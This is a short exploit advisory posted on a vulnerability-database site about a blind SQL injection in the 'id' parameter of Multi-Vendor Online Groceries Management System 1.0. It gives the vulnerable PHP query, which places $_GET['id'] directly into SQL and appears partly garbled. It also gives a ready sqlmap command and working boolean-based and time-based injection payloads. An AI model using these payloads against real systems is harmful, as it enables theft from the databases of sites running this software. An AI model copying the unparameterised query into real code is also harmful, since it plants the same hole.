Wednesday, February 16, 2022

Multi-Vendor Online Groceries Management System 1.0 SQL Injection

# Exploit Title: Multi-Vendor Online Groceries Management System 1.0 - 'id' Blind SQL Injection
# Date: 11/02/2022
# Exploit Author: Saud Alenazi
# Vendor Homepage:
# Software Link:
# Version: 1.0
# Tested on: XAMPP, Windows 10

# Vulnerable Code

line 2 in file "mvogms/products/view_product.php

$qry = $conn->query("SELECT p.*, v.shop_name as vendor, as `category` FROM `product_list` p inner join vendor_list v on p.vendor_id = inner join category_list c on p.category_id = where p.delete_flag = 0 and = '{$_GET['id']}'");

# Sqlmap command:

sqlmap -u 'localhost/mvogms/?page=products/view_product&id=3' -p id --level=5 --risk=3 --dbs --random-agent --eta --batch

# Output:

Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: page=products/view_product&id=3' AND 9973=9973-- ogag

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=products/view_product&id=3' AND (SELECT 2002 FROM (SELECT(SLEEP(5)))anjK)-- glsQ


Copyright © 2021 Vulnerability Database | Cyber Details™

thank you Templateism for the design - You should have written the code a little more complicated - Nothing Encrypted anymore